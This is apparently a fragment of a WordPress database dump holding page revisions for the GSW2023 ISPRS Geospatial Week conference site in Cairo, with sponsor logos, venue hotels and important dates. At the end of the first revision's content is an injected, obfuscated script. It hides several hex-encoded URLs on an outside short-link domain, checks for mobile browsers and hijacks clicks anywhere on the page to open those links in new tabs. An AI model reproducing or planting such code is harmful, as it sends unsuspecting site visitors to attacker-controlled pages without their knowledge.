dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:04:53','2023-06-09 22:04:53','',3066,'https://gsw2023.com/?p=4666',0,'revision','',0),
(4667,1,'2023-06-09 22:06:32','2023-06-09 22:06:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" responsiveness=\"post_width_based\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li 